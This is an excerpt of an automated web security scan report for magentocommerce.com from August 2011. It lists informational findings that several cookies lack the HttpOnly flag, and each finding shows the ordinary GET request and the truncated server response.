Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171052; expires=Sat, 11-Aug-2012 13:44:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:12 GMT
Content-Length: 38025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.105. http://www.magentocommerce.com/partners/find/bronze-solution/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/bronze-solution/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/find/bronze-solution/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176342; expires=Sat, 11-Aug-2012 15:12:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fpartners%2Ffind%2Fbronze-solution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 65854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.106. http://www.magentocommerce.com/partners/find/hosting-partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/hosting-partners/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/find/hosting-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176345; expires=Sat, 11-Aug-2012 15:12:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fpartners%2Ffind%2Fhosting-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:25 GMT
Content-Length: 51575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.107. http://www.magentocommerce.com/partners/find/industry-partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/industry-partners/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/find/industry-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Findustry-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 54897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.108. http://www.magentocommerce.com/partners/find/solution-partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/solution-partners/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/find/solution-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176347; expires=Sat, 11-Aug-2012 15:12:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Fsolution-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:27 GMT
Content-Length: 63005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.109. http://www.magentocommerce.com/partners/hosting-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/hosting-partners

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/hosting-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176331; expires=Sat, 11-Aug-2012 15:12:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fpartners%2Fhosting%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:11 GMT
Content-Length: 37154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.110. http://www.magentocommerce.com/partners/industry-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/industry-partners

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/industry-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176341; expires=Sat, 11-Aug-2012 15:12:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Findustry%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 38023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.111. http://www.magentocommerce.com/partners/solution-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/solution-partners

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/solution-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Fsolution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 39161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.112. http://www.magentocommerce.com/partners/view/117/gorilla  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/view/117/gorilla

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/view/117/gorilla HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176374; expires=Sat, 11-Aug-2012 15:12:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fpartners%2Fview%2F117%2Fgorilla%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:54 GMT
Content-Length: 57995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.113. http://www.magentocommerce.com/pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pl HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176513; expires=Sat, 11-Aug-2012 15:15:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fpl%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:13 GMT
Content-Length: 70432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.114. http://www.magentocommerce.com/product/community-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/community-edition

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/community-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Fcommunity-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 32482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.115. http://www.magentocommerce.com/product/compare  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/compare

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/compare HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175710; expires=Sat, 11-Aug-2012 15:01:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fproduct%2Fcompare%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:50 GMT
Content-Length: 47177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.116. http://www.magentocommerce.com/product/deployed-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/deployed-solutions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/deployed-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175705; expires=Sat, 11-Aug-2012 15:01:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:45 GMT
Content-Length: 32561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.117. http://www.magentocommerce.com/product/emerging-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/emerging-business

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/emerging-business HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_activity=1313170894; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.2.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171056; expires=Sat, 11-Aug-2012 13:44:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:16 GMT
Content-Length: 33707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.118. http://www.magentocommerce.com/product/enterprise-community-faqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-community-faqs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/enterprise-community-faqs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175681; expires=Sat, 11-Aug-2012 15:01:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fproduct%2Fenterprise-community-faqs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:21 GMT
Content-Length: 42996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.119. http://www.magentocommerce.com/product/enterprise-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-edition

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:00:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175633; expires=Sat, 11-Aug-2012 15:00:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:00:33 GMT
Content-Length: 37947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
